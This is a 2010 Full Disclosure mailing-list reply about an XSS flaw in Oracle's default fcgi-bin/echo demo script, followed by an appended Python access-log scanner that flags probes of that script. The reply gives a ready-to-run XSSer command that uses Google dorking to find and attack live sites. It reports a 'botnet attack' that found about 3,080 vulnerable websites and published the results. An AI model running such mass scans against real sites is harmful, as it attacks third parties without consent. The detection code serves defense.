Full Disclosure mailing list archives
Re: XSS in Oracle default fcgi-bin/echo
From: psy <root () lordepsylon net>
Date: Fri, 08 Oct 2010 16:16:47 +0200
Maybe with an FD PoC they'll decide to fix it.
Detecting, exploiting and reporting the "fcgi-bin/echo" Oracle vulnerability with XSSer (http://xsser.sf.net):
./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy "http://127.0.0.1:8118" -s --publish
Results of the botnet attack in real time:
http://identi.ca/xsserbot01
http://twitter.com/xsserbot01
Reported: approx. 3.080 vulnerable websites.
psy.
Paul, list,
On 10/08/2010 12:18 AM, paul.szabo () sydney edu au wrote:
> Many Oracle web server installations have an fcgi-bin/echo script
> left over from the default demo (google for inurl:fcgi-bin/echo). That
> script seems vulnerable to XSS. (PoC exploit and explanation of
> impact withheld now.)
> I asked security () oracle com and they said that "... this issue has
> been resolved in an earlier Critical Patch Update."
They said the same to me one year ago.
regards,
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
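A defender-side check, added here and not code from psy's or Paul's posts nor from XSSer: it walks access-log lines, keeps every request that reached the leftover fcgi-bin/echo demo script, and flags query strings carrying markup, so an admin can see both whether the script is still served (any 200) and whether it is being probed. It assumes Apache/OHS "combined" log format and that the echo script reflects its query string; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache-style "combined" access-log line (assumed format, not from the thread).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Markup that an echoing script would reflect unescaped into the response.
MARKUP = re.compile(r'<|>|javascript:|on\w+\s*=', re.IGNORECASE)


def parse_line(line):
    """Split one log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_echo_probes(lines):
    """Return (ip, status, decoded_query, suspicious) for each request whose
    path ends in /fcgi-bin/echo; other requests are ignored."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec['target'])
        if not parts.path.endswith('/fcgi-bin/echo'):
            continue
        query = unquote_plus(parts.query)   # decode %3C etc. before matching
        hits.append((rec['ip'], int(rec['status']), query,
                     bool(MARKUP.search(query))))
    return hits


def still_exposed(hits):
    """True if the demo script answered any request with 200, i.e. it is
    still deployed regardless of what the patch notes claim."""
    return any(status == 200 for _, status, _, _ in hits)


# Constructed sample lines (RFC 5737 documentation addresses).
SAMPLE = [
    '203.0.113.7 - - [08/Oct/2010:15:59:01 +0200] "GET /fcgi-bin/echo?name=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Oct/2010:15:59:02 +0200] "GET /fcgi-bin/echo?name=hello HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Oct/2010:16:01:10 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.21"',
    '198.51.100.4 - - [08/Oct/2010:16:01:11 +0200] "GET /fcgi-bin/echo HTTP/1.1" 404 210 "-" "curl/7.21"',
]

if __name__ == '__main__':
    for hit in find_echo_probes(SAMPLE):
        print(hit)
    print('echo script still served:', still_exposed(find_echo_probes(SAMPLE)))
```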